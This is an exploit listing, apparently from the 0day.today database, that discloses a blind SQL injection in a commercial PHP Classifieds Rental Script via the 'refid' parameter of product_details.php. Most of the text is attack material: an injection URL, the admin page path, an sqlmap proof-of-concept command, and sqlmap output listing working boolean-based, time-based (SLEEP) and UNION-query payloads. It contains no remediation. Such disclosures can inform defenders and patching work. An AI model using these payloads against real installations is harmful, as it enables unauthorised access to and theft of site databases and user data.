Lucene search

K
zdtOoN_Boy1337DAY-ID-25369
HistoryOct 07, 2016 - 12:00 a.m.

PHP Classifieds Rental Script - Blind SQL Injection Vulnerability

2016-10-0700:00:00
OoN_Boy
0day.today
32

Exploit for php platform in category web applications

[x]========================================================================================================================================[x]
 | Title    : PHP Classifieds Rental Script Blind SQL Vulnerabilities
 | Software : PHP Classifieds Rental Script
 | Vendor   : http://www.i-netsolution.com/
 | Demo         : http://www.i-netsolution.com/item/php-classifieds-rental-script/244993
 | Date         : 06 October 2016
 | Author   : OoN_Boy
[x]========================================================================================================================================[x]
  
  
  
[x]========================================================================================================================================[x]
 | Technology       : PHP
 | Database     : MySQL
 | Price        : $ 99
 | Description      : PHP Classifieds Rental Script The PHP Rental Classifieds Script is one among the limited software's, which are designed
              so user-friendly that anyone with minimal knowledge of operating a computer can utilize it to its optimum. Besides being
              an easy-to- use software, this Property Rental Script
[x]========================================================================================================================================[x]
  
  
[x]========================================================================================================================================[x]
 | Exploit  : http://localhost/product_details.php?refid=%Inject_Here%1319258872
 | Aadmin Page  : http://localhost/[path]/admin/index.php  
[x]========================================================================================================================================[x]
  
  
  
[x]========================================================================================================================================[x]
 | Proof of concept : sqlmap -u "http://localhost/product_details.php?refid=1319258872" --invalid-string
[x]========================================================================================================================================[x] 
 
 ---
Parameter: refid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: refid=1319258872' AND 3912=3912 AND 'HTMi'='HTMi
 
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: refid=1319258872' OR SLEEP(5) AND 'QwXZ'='QwXZ
 
    Type: UNION query
    Title: MySQL UNION query (NULL) - 26 columns
    Payload: refid=xCUcyB' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a787671,0x644e6e5046537647684864705a527667796f454c666c4656644a73506d4e627a48574969424a4756,0x7176786271),NULL,NULL,NULL,NULL,NULL#
---

#  0day.today [2018-01-05]  #